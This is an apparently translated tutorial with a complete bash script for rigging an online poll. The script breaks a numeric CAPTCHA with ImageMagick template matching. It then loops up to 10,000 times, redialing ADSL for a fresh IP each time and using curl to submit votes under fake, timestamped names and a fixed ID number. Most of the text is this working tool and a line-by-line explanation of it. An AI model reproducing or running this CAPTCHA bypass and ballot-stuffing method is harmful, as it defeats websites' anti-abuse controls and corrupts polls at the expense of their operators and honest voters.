The idea is to start from an image containing a verification code, remove interference such as background, color, and stripes, and reduce the image to black and white pixels. Then work out where each character sits and cut the image into small images, one per character. When cropping, leave a border around each character and keep the character centered in its small image; this helps eliminate interference and improves the recognition rate. To improve accuracy, I used GIMP to enlarge the verification code 1600 times and worked on individual pixels. To recognize the code in a new image, crop the character at each position in the same way and compare it with the ten small images saved earlier, one per digit; the number of the image with the smallest difference is the character at that position. ImageMagick runs from the command line, and its compare tool supports metrics such as MAE, MSE, PSE, PSNR, and RMSE. Choose the metric that best suits the interference in the image, or combine several, and the verification code can be identified easily.
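The slicing step described above can be sketched in shell. This snippet only computes ImageMagick crop geometry strings of the form WxH+X+Y for equally spaced characters; it does not touch any image. The helper name crop_geometries is hypothetical, and the cell size and offsets (9x13 pixels, starting at x=1, y=2, spaced 9 pixels apart) are the values used by the script in this article, so they would need to be measured again for any other image.

```shell
#!/bin/bash
# crop_geometries COUNT WIDTH HEIGHT X0 Y0 STEP
# Print one ImageMagick geometry (WxH+X+Y) per character cell, left to right.
# (Hypothetical helper, not part of the original script.)
crop_geometries() {
    local count=$1 width=$2 height=$3 x0=$4 y0=$5 step=$6
    local i=0
    while [ "$i" -lt "$count" ]; do
        echo "${width}x${height}+$((x0 + i * step))+${y0}"
        i=$((i + 1))
    done
}

# Four 9x13 cells starting at (1,2), 9 pixels apart.
crop_geometries 4 9 13 1 2 9
```

Each printed geometry could then be handed to the -crop option of convert to cut out one character.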
Once the verification code can be recognized, automated posting is easy. On Linux there is a powerful tool for this, curl, which can talk to a remote server over HTTP, HTTPS, FTP, and other protocols and upload or download data automatically. First, use curl to look at the HTTP header information:
1 * About to connect() to www.2cto.com port 80
2 * Trying xxx.xxx... * connected
3 * Connected to www.2cto.com (xxx.xxx) port 80
4 > GET / HTTP/1.1
5 User-Agent: curl/7.13.1 (debian-linux-gnu) libcurl/7.13.1 OpenSSL/0.9.7e zlib/1.2.2.2 libidn/0.5.13
6 Host: www.2cto.com
7 Pragma: no-cache
8 Accept: */*
9
10 < HTTP/1.1 302 Moved Temporarily
11 < Via: 1.1 PROXY
12 < Connection: Keep-Alive
13 < Proxy-Connection: Keep-Alive
14 < Transfer-Encoding: chunked
15 < Date: Tue, 04 Jul 2006 05:55:16 GMT
16 < Location: http://www.bkjia.com/queryVote.do?Type=netvotes&Group=1
17 < Content-Type: text/html; charset=gb2312
18 < Server: WebLogic Server 8.1 SP2 Fri Dec 5 15:01:51 PST 2003 316284
19 < Set-Cookie: JSESSIONID=eqcedycc2jgex2slot231l6n1_ostzaff9zlshuxb2mxrqlbe1i!1559900188; path=/
20
21
22
23 <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
24 <title> xxxx </title>
25
26 <body bgcolor="#FFFFFF">
27 ...
28 </body>
29
30
31
32 * Connection #0 to host www.2cto.com left intact
33 * Closing connection #0
34
From the Set-Cookie header on row 19, we can see that the site uses the JSESSIONID cookie. Looking at the source of the voting page, I found that votes are submitted with the POST method and that five form fields must be sent. All of these can be written down and assembled into a POST string.
With that in place, here is the script I wrote (the source website has been changed to www.2cto.com):
1 #!/bin/bash
2
3 # exec 1>curl.log
4
5 function parse
6 {
7     ret=
8     file=$1
9     convert "$file.jpeg" -crop 9x13+1+2 "$file-a.jpeg"    # cut out the four characters
10     convert "$file.jpeg" -crop 9x13+10+2 "$file-b.jpeg"
11     convert "$file.jpeg" -crop 9x13+19+2 "$file-c.jpeg"
12     convert "$file.jpeg" -crop 9x13+28+2 "$file-d.jpeg"
13     for pic in a b c d
14     do
15         dB=1000000000    # a very high value
16         value=10
17         for num in 0 1 2 3 4 5 6 7 8 9
18         do
19             curr=$(compare -metric PSE "$file-$pic.jpeg" "xj-$num.jpeg" null: 2>&1 | awk '{print $1}')    # 2>&1: newer ImageMagick prints the metric on stderr
20             small=$(echo "$curr < $dB" | bc)    # bc prints 1 when the comparison is true
21             if [ "$small" -eq 1 ]; then
22                 value=$num
23                 dB=$curr
24             fi
25         done
26         ret=$ret$value
27     done
28     rm -fr "$file"-[abcd].jpeg
29     echo $ret
30 }
31
32
33 hit=0
34 for ((i = 1; i < 10000; i++))
35 do
36     pon dsl-provider >/dev/null 2>curl.log
37     sleep 3
38     curl -s \
39         -c cookie \
40         -j \
41         -A "Mozilla/4.0" \
42         http://www.bkjia.com/MakeEXPWD > code.jpeg
43     code=$(parse code)
44     curl -s \
45         -b cookie \
46         -d "tid=35" \
47         -d "name=jerry$(date +%s)" \
48         -d "certid=310902790504054" \
49         -d "tele=23493451" \
50         -d "authcode=$code" \
51         -d "send=%20" \
52         -e "http://www.bkjia.com/VoteForm.jsp?TID=35" \
53         -A "Mozilla/4.0" \
54         http://www.bkjia.com/vote.do | grep -q 'vote successfully'
55     if [ $? -eq 0 ]; then
56         hit=$((hit + 1))
57         echo -n -e "Total: $i, Hit $hit, Last: $code\r"
58     else true
59     fi
60     rm -fr code.jpeg
61     poff dsl-provider >/dev/null 2>curl.log
62 done
63 exit 0
64
The third line of the script, commented out here, redirects the standard output of the whole program to a file when enabled, which is useful for unattended batch runs. If the program produces a lot of output, you do not have to redirect each command one by one.
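A minimal sketch of what such an exec redirection does, using a hypothetical helper run_logged and a temporary log file. Running exec with only a redirection and no command re-points the shell's own standard output, so every later command writes to the file. The subshell is an addition here; it keeps the effect from leaking into the calling shell.

```shell
#!/bin/bash
# run_logged LOGFILE: run a few commands with stdout redirected once via exec.
# (Hypothetical helper for illustration only.)
run_logged() {
    (
        exec 1>"$1"        # from here on, stdout of this subshell goes to LOGFILE
        echo "step one"
        echo "step two"    # no per-command redirection needed
    )
}

log=$(mktemp)
run_logged "$log"
cat "$log"
rm -f "$log"
```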
Next comes the parse function, which recognizes the downloaded image. It crops the predefined regions of the image and compares each one with the prepared small images in turn. The image with the smallest value of the metric wins, and its number is the character at that position. The comparison needs floating-point arithmetic, which is a weakness of bash, so bc is used for the calculation. The compare command, which compares two images, takes fairly complex parameters and supports several metrics, such as MAE, MSE, PSE, PSNR, and RMSE.
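The selection logic can be isolated from ImageMagick and tried on its own. The sketch below is not the author's code: float_lt and best_match are hypothetical helpers, the scores are made up, and the awk fallback is an addition for systems without bc. It shows the same idea as the inner loop, keeping the label whose floating-point score is smallest.

```shell
#!/bin/bash
# float_lt A B: succeed (exit 0) when A < B, compared as floating-point numbers.
# Uses bc as in the script; falls back to awk when bc is not installed.
float_lt() {
    if command -v bc >/dev/null 2>&1; then
        [ "$(echo "$1 < $2" | bc -l)" -eq 1 ]
    else
        awk -v a="$1" -v b="$2" 'BEGIN { exit !(a < b) }'
    fi
}

# best_match LABEL=SCORE ...: print the label with the smallest score.
best_match() {
    local best_label="" best_score="" pair label score
    for pair in "$@"; do
        label=${pair%%=*}
        score=${pair#*=}
        if [ -z "$best_score" ] || float_lt "$score" "$best_score"; then
            best_label=$label
            best_score=$score
        fi
    done
    echo "$best_label"
}

# Made-up difference scores for three candidate digits.
best_match 0=1532.7 1=87.25 2=904.1
```

Starting from an empty best score, rather than a very large constant as the script does, avoids having to guess an upper bound for the metric.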
After the function comes the main loop of the program. The ADSL connection is dropped and redialed on every iteration. There may be a delay between a successful dial and normal data transfer, so the script sleeps for a few seconds first.
The first curl in the loop does two things: it downloads the image containing the verification code from the target site, and it saves the cookie for the current connection, which initializes the session on the server. The -j option tells curl to discard the previous session cookies after each redial.
The second curl sends the cookie just obtained and submits the voting data to the target site with the POST method. The name field is the voter's name; the voting program allows only one vote per name, so I simply append the current time to it. The page returned after voting is searched for the words "vote successfully"; if they are present, the vote succeeded and the counter is incremented by one. The $? on line 55 is the return value of the previous command: grep returns 0 when the keyword is found.
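The two small tricks in this step, a name made unique with a timestamp and a counter driven by grep's exit status, can be tried without any network access. In this sketch unique_name and is_success are hypothetical helpers, and the response text is a made-up sample rather than real server output.

```shell
#!/bin/bash
# unique_name PREFIX: append the current Unix time in seconds to PREFIX.
unique_name() {
    echo "$1$(date +%s)"
}

# is_success TEXT: exit 0 when TEXT contains the success marker.
is_success() {
    printf '%s\n' "$1" | grep -q 'vote successfully'
}

hit=0
response='<html><body>vote successfully</body></html>'   # made-up sample page
if is_success "$response"; then
    hit=$((hit + 1))
fi
echo "name=$(unique_name jerry) hit=$hit"
```

A timestamp in seconds is only unique if consecutive requests are at least one second apart, which holds in the script because each iteration sleeps for three seconds.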
After each iteration the temporary file must be deleted and the status line updated. The -n option of echo suppresses the trailing newline, and with -e the control character \r returns the cursor to the start of the line, so the same status line is updated in place instead of printing one line per result, which looks much tidier.
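The in-place status line can be tried in isolation. This sketch uses printf instead of echo -n -e, a substitution that behaves the same way across shells; status_line is a hypothetical helper and the numbers are dummy values.

```shell
#!/bin/bash
# status_line TOTAL HIT LAST: rewrite the current terminal line in place.
# The trailing \r moves the cursor back to column 0 without starting a new line.
status_line() {
    printf 'Total: %d, Hit: %d, Last: %s\r' "$1" "$2" "$3"
}

for i in 1 2 3; do
    status_line "$i" "$i" "000$i"
done
echo    # move to a fresh line once the loop ends
```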